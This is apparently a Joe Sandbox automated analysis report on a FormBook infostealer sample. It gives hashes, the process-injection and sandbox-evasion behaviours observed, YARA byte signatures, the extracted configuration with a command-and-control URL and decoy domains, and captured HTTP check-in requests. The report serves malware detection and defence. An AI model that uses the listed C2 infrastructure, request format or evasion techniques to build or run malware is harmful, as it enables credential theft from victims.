Loading ...

Play interactive tourEdit tour

Analysis Report vBugmobiJh.exe

Overview

General Information

Sample Name:vBugmobiJh.exe
Analysis ID:356496
MD5:5b59e521935e56a03255623df51c1631
SHA1:b6714751ef5127dd84bed782a30eb44b7add8813
SHA256:e6370f5f39e8e3d7a2506659786deadd1fe5ce8208cb2b6bf7748b6637a3b793
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • vBugmobiJh.exe (PID: 5108 cmdline: 'C:\Users\user\Desktop\vBugmobiJh.exe' MD5: 5B59E521935E56A03255623DF51C1631)
    • vBugmobiJh.exe (PID: 68 cmdline: C:\Users\user\Desktop\vBugmobiJh.exe MD5: 5B59E521935E56A03255623DF51C1631)
    • vBugmobiJh.exe (PID: 6088 cmdline: C:\Users\user\Desktop\vBugmobiJh.exe MD5: 5B59E521935E56A03255623DF51C1631)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 3664 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 5428 cmdline: /c del 'C:\Users\user\Desktop\vBugmobiJh.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rizrvd.com/bw82/"], "decoy": ["fundamentaliemef.com", "gallerybrows.com", "leadeligey.com", "octoberx2.online", "climaxnovels.com", "gdsjgf.com", "curateherstories.com", "blacksailus.com", "yjpps.com", "gmobilet.com", "fcoins.club", "foreverlive2027.com", "healthyfifties.com", "wmarquezy.com", "housebulb.com", "thebabyfriendly.com", "primajayaintiperkasa.com", "learnplaychess.com", "chrisbubser.digital", "xn--avenr-wsa.com", "exlineinsurance.com", "thrivezi.com", "tuvandadayvitos24h.online", "illfingers.com", "usmedicarenow.com", "pandabutik.com", "engageautism.info", "magnabeautystyle.com", "texasdryroof.com", "woodlandpizzahartford.com", "dameadamea.com", "sedaskincare.com", "ruaysatu99.com", "mybestaide.com", "nikolaichan.com", "mrcabinetkitchenandbath.com", "ondemandbarbering.com", "activagebenefits.net", "srcsvcs.com", "cbrealvitalize.com", "ismaelworks.com", "medkomp.online", "ninasangtani.com", "h2oturkiye.com", "kolamart.com", "acdfr.com", "twistedtailgatesweeps1.com", "ramjamdee.com", "thedancehalo.com", "joeisono.com", "glasshouseroadtrip.com", "okcpp.com", "riggsfarmfenceservices.com", "mgg360.com", "xn--oi2b190cymc.com", "ctfocbdwholesale.com", "openspiers.com", "rumblingrambles.com", "thepoetrictedstudio.com", "magiclabs.media", "wellnesssensation.com", "lakegastonautoparts.com", "dealsonwheeeles.com", "semenboostplus.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.vBugmobiJh.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.vBugmobiJh.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.vBugmobiJh.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        6.2.vBugmobiJh.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.vBugmobiJh.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.rizrvd.com/bw82/"], "decoy": ["fundamentaliemef.com", "gallerybrows.com", "leadeligey.com", "octoberx2.online", "climaxnovels.com", "gdsjgf.com", "curateherstories.com", "blacksailus.com", "yjpps.com", "gmobilet.com", "fcoins.club", "foreverlive2027.com", "healthyfifties.com", "wmarquezy.com", "housebulb.com", "thebabyfriendly.com", "primajayaintiperkasa.com", "learnplaychess.com", "chrisbubser.digital", "xn--avenr-wsa.com", "exlineinsurance.com", "thrivezi.com", "tuvandadayvitos24h.online", "illfingers.com", "usmedicarenow.com", "pandabutik.com", "engageautism.info", "magnabeautystyle.com", "texasdryroof.com", "woodlandpizzahartford.com", "dameadamea.com", "sedaskincare.com", "ruaysatu99.com", "mybestaide.com", "nikolaichan.com", "mrcabinetkitchenandbath.com", "ondemandbarbering.com", "activagebenefits.net", "srcsvcs.com", "cbrealvitalize.com", "ismaelworks.com", "medkomp.online", "ninasangtani.com", "h2oturkiye.com", "kolamart.com", "acdfr.com", "twistedtailgatesweeps1.com", "ramjamdee.com", "thedancehalo.com", "joeisono.com", "glasshouseroadtrip.com", "okcpp.com", "riggsfarmfenceservices.com", "mgg360.com", "xn--oi2b190cymc.com", "ctfocbdwholesale.com", "openspiers.com", "rumblingrambles.com", "thepoetrictedstudio.com", "magiclabs.media", "wellnesssensation.com", "lakegastonautoparts.com", "dealsonwheeeles.com", "semenboostplus.com"]}
          Multi AV Scanner detection for domain / URLShow sources
          Source: climaxnovels.comVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: vBugmobiJh.exeVirustotal: Detection: 25%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: vBugmobiJh.exeJoe Sandbox ML: detected
          Source: 6.2.vBugmobiJh.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: vBugmobiJh.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: vBugmobiJh.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.489757839.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: netsh.pdb source: vBugmobiJh.exe, 00000006.00000002.268127639.0000000000EA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp, netsh.exe, 0000000A.00000002.476422535.0000000003B40000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: vBugmobiJh.exe, 00000006.00000002.268127639.0000000000EA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp, netsh.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.489757839.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 94.73.146.42:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 94.73.146.42:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 94.73.146.42:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rizrvd.com/bw82/
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.h2oturkiye.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=G5V/jI1lXUWhm2/po/i12Eg93VLS1Yw8/s5fANqQYS1eyL2v/ZzyMw3Ygf/31m6ddEJO HTTP/1.1Host: www.ramjamdee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.rizrvd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXar9S1Zs43DY HTTP/1.1Host: www.gdsjgf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.climaxnovels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl HTTP/1.1Host: www.thebabyfriendly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj HTTP/1.1Host: www.wellnesssensation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.gallerybrows.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.usmedicarenow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI HTTP/1.1Host: www.activagebenefits.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewIP Address: 52.128.23.153 52.128.23.153
          Source: Joe Sandbox ViewASN Name: DOSARRESTUS DOSARRESTUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.h2oturkiye.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=G5V/jI1lXUWhm2/po/i12Eg93VLS1Yw8/s5fANqQYS1eyL2v/ZzyMw3Ygf/31m6ddEJO HTTP/1.1Host: www.ramjamdee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.rizrvd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXar9S1Zs43DY HTTP/1.1Host: www.gdsjgf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.climaxnovels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl HTTP/1.1Host: www.thebabyfriendly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj HTTP/1.1Host: www.wellnesssensation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.gallerybrows.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip HTTP/1.1Host: www.usmedicarenow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI HTTP/1.1Host: www.activagebenefits.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.fcoins.club
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Tue, 23 Feb 2021 08:00:33 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67
          Source: explorer.exe, 00000007.00000000.255680100.000000000F659000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: vBugmobiJh.exe, 00000001.00000003.214832645.0000000005766000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
          Source: vBugmobiJh.exe, 00000001.00000003.214832645.0000000005766000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlu
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
